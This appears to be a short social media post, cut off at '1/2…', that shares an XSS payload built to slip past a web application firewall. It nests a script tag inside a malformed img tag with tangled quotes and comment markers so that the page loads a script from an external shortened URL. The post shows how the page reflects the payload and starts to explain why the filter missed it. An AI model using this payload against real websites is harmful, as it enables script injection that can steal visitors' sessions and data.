XSS WAF Bypass:

<img+a=’a+<!–‘+a=”>”‘+”<script+a+src=https://t.co/Qf3AbxaZ2V>a</script>

Reflected as:
<img a=’a <!–‘ a=”>”‘ “<script a src=https://t.co/Qf3AbxaZ2V>a</script>

Explanation: Script tags don’t work inside a <img> tags so the WAF was allowing me to add them 1/2… https://t.co/BDmVduQmdx